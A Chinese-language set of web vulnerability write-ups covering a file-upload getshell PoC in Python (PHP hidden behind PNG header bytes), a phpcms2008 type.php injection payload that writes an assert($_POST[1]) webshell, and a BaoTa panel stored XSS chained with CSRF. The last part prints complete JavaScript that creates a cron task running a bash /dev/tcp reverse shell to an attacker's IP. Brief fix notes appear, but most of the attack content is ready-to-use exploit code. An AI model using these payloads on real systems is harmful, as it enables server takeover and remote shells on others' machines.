对文件内容做了检查，文件大小不能过大或过小，合成马最好放到中间。

请求包截图，删除不必要的参数仍旧能够上传。

所以导致前台getshell

PoC

import requests

session = requests.Session()

paramsGet = {"s":"/wap/upload/photoalbumupload"}
paramsPost = {"file_path":"upload/goods/","album_id":"30","type":"1,2,3,4"}
paramsMultipart = [('file_upload', ('themin.php', "\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89\x00\x00\x00\x0bIDAT\x08\x99c\xf8\x0f\x04\x00\x09\xfb\x03\xfd\xe3U\xf2\x9c\x00\x00\x00\x00IEND\xaeB`\x82<? php phpinfo(); ?>", 'application/octet-stream'))]
headers = {"Accept":"application/json, text/javascript, */*; q=0.01","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Android 9.0; Mobile; rv:61.0) Gecko/61.0 Firefox/61.0","Referer":"http://127.0.0.1/index.php?s=/admin/goods/addgoods","Connection":"close","Accept-Language":"en","Accept-Encoding":"gzip, deflate"}
cookies = {"action":"finish"}
response = session.post("http://127.0.0.1/index.php", data=paramsPost, files=paramsMultipart, params=paramsGet, headers=headers, cookies=cookies)

print("Status code:   %i" % response.status_code)
print("Response body: %s" % response.content)

参考链接

1. https://xz.aliyun.com/t/3767

phpcms2008老版本type.php存在代码注入可直接getshell。不过版本过低，使用人数较少，影响范围较小，当作拓展思路不错。

漏洞简介

当攻击者向装有phpcms2008版本程序的网站发送如下payload时

/type.php?template=tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss

那么@unlink(_FILE_);assert($_POST[1]);这句话会被写入rss.tpl.php，即getshell。

漏洞分析

在type.php中$template用户可控，并且下方传入了template()函数，这个函数是在/include/global.func.php定义的，跟进下

可以看到执行了template_compile()函数，继续跟进，这个函数在/include/template.func.php中

在这个方法中，$template变量同时被用于$compiledtplfile中文件路径的生成，和$content中文件内容的生成。

而前文所述的攻击payload将$template变量被设置为如下的值

tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss

所以在template_compile()方法中，调用file_put_contents()函数时的第一个参数就被写成了data/cache_template/phpcms_tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss.tpl.php，这将被php解析成data/cache_template/rss.tpl.php。

最终，@unlink(_FILE_);assert($_POST[1]);将被写入该文件。

修复建议

手动过滤$template参数，避免输入{ (这类字符被当作路径和脚本内容处理。

升级才是正道，那么老的版本了还有人在用，是有多懒。

参考链接

https://xz.aliyun.com/t/3454

什么是宝塔面板？

宝塔面板是一款使用方便、功能强大且终身免费的服务器管理软件,支持Linux与Windows系统。一键配置:LAMP/LNMP、网站、数据库、FTP、SSL,通过Web端轻松管理服务器。推出至今备受中小站点站长喜爱，下载量过百万。

【漏洞代码分析】

在6.x linux版本宝塔面板当中当中，相对与5.x版本，记录了验证码错误并存入数据库当中，存储xss缺陷就是在此处产生。

我们直接看漏洞代码。

直接分析post请求部分。

代码如下：

我们可以看到这里首先判断了是否有 用户名密码，然后是验证码。判断这个IP是否是有登陆失败的记录。如果大于1 记录一下，随后将错误次数大于1的用户名的和密码都进行了记录。
从数据库中读取管理员账号密码。进行对比。如果没有成功就返回一个错误

关键的代码如下：

此处记录了一下post 的请求。然后将code传入到了写日志的一个函数里面。追踪一下这个函数。 在public.py 里面，找到如下函数

这里就是一个写日志的功能。定义了一个teyp 然后是args 。这里把code 传递过来。就直接写入了日志。没有做任何过滤处理。然后就导致了xss漏洞产生。
可以在宝塔数据库当中，看到logs数据库里存储的信息

【漏洞复现】

我们直接在面板登录处，随便输入一个账号密码，触发失败，要求输入验证码。

由于没有任何过滤处理，我们直接输入弹窗的payload：

<script>alert('www.dafsec.org')</script>

登录后台后，打开安全模块，成功触发弹窗。

由于服务器管理面板的特殊性，后台可以进行敏感操作。手写js远程调用，利用csrf漏洞在计划任务处配合存储xss，可成功反弹shell，弹shell成功截图如下：

远程调用的js代码如下：

function addTask(TaskName, execTime, ip, port) {
    var execShell = 'bash -i >& /dev/tcp/your_ip/your_port 0>&1';
    execShell = encodeURIComponent(execShell);
    var params = 'name=' + TaskName + '&type=minute-n&where1=' + execTime + '&hour=&minute=&week=&sType=toShell&sBody=' + execShell + '&sName=&backupTo=localhost&save=&urladdress=undefined'
    var xhr = new XMLHttpRequest();
    xhr.open('POST', '/crontab?action=AddCrontab', false);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.send(params);
}

function execTask(TaskName) {
    var xhr = new XMLHttpRequest();
    xhr.open('POST', '/crontab?action=GetCrontab', true);
    xhr.send();
    xhr.onload = function () {
        if (this.readyState == 4 && this.status == 200) {
            var res = JSON.parse(this.responseText);
            if (res[0].name == TaskName) {
                var TaskID = res[0].id.toString();
                var xhr = new XMLHttpRequest();
                xhr.open('POST', '/crontab?action=StartTask', false);
                xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                var params = 'id=' + TaskID;
                xhr.send(params);
                delTask(res[0].id);
                console.log(res[0].id);
                return res[0].id;
            }
        }
    }
}

function delTask(TaskID) {
    var params = 'id=' + TaskID.toString();
    var xhr = new XMLHttpRequest();
    xhr.open('POST', '/crontab?action=DelCrontab', false);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.send(params);
}

var TaskName = Math.random().toString(36).substring(7);
addTask(TaskName, '5', '1.1.1.1', '53');
execTask(TaskName);

【后序】

宝塔官方已修复该漏洞，但仍有大量存在漏洞主机暴露于公网，请及时更新至最新版本。
官方已修复该漏洞，漏洞环境可以将附件当中的test.py同名覆盖掉宝塔最新版的/www/server/panel/class/userlogin.py